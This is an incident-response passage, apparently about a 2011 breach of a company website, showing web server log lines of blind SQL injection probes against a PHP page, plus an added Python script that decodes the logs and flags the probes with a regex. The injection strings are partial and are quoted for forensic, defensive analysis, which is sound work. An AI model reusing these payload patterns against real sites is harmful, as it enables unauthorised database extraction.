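Details of the data breach incident
From the Barracuda Web Application Firewall logs, we confirmed that the unauthorized user used two clients to probe and attack the website:
Using the information reported by the Barracuda Web Application Firewall, we were able to quickly filter the web server logs and locate the corresponding entries.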
2011-04-10 03:19:17 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((database()),13,1))=99%20and%20”x”=”x 80 - 87.1
2011-04-10 03:19:17 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:18 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((database()),13,1))=98%20and%20”x”=”x 80 - 87.1
2011-04-10 03:19:18 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((database()),13,1))=97%20and%20”x”=”x 80 - 87.1
2011-04-10 03:19:19 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:21 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:24 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:26 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:28 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:31 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:32 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:33 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:37 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:39 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:41 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:46 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:48 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:48 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info
2011-04-10 03:19:49 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info
2011-04-10 03:19:51 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:51 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info
2011-04-10 03:19:52 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info
2011-04-10 03:19:53 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:53 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info
2011-04-10 03:19:54 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info
2011-04-10 03:19:54 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:54 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info
2011-04-10 03:19:55 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:57 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:57 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:57 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
Note: the web logs use Greenwich Mean Time (GMT), while the Web Application Firewall uses Pacific Daylight Time (PDT).
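The filtering step described above can be reproduced with a short script. The following is an added example, not code from the original article or from Barracuda: it URL-decodes the query field, flags the boolean-based blind SQL injection probes visible in the excerpt, and converts each GMT timestamp to PDT so the hits line up with the WAF log. The field layout (date, time, method, path, query), the fixed UTC-7 offset and all function names are assumptions.

```python
import re
from collections import Counter
from datetime import datetime, timedelta, timezone
from urllib.parse import unquote

# First three lines are copied from the excerpt above (truncated as on the page);
# the last line is a constructed benign request for contrast.
SAMPLE_LOG = """\
2011-04-10 03:19:17 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((database()),13,1))=99%20and%20”x”=”x 80 - 87.1
2011-04-10 03:19:17 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:48 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info
2011-04-10 03:20:05 GET /ns/customers/customer_verticals.php v=12 80 - 192.0.2.10
"""

PDT = timezone(timedelta(hours=-7))  # assumed fixed offset for the WAF clock

# A quote breaking out of the parameter, then AND plus a character or length probe.
PROBE = re.compile(r"""["'”“]\s*and\s+(ascii\s*\(\s*substring|length)\s*\(""", re.I)

def parse(line):
    """Split one log line into (UTC timestamp, path, decoded query)."""
    date, time, _method, path, query = line.split(" ")[:5]
    ts = datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S")
    # unquote() leaves a truncated trailing '%' untouched instead of failing
    return ts.replace(tzinfo=timezone.utc), path, unquote(query)

def find_probes(log_text):
    """Return one record per request whose query matches the probe pattern."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, path, query = parse(line)
        m = PROBE.search(query)
        if m:
            kind = "length" if m.group(1).lower() == "length" else "char"
            hits.append({"waf_time": ts.astimezone(PDT).strftime("%Y-%m-%d %H:%M:%S"),
                         "path": path, "kind": kind, "query": query})
    return hits

def summarize(hits):
    """Count probes per (path, probe kind) to show which endpoint is being walked."""
    return Counter((h["path"], h["kind"]) for h in hits)

if __name__ == "__main__":
    for h in find_probes(SAMPLE_LOG):
        print(h["waf_time"], h["kind"], h["query"])
    print(summarize(find_probes(SAMPLE_LOG)))
```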
By carefully examining each log entry on the Barracuda Web Application Firewall, we found clues about the attacker and the tools used: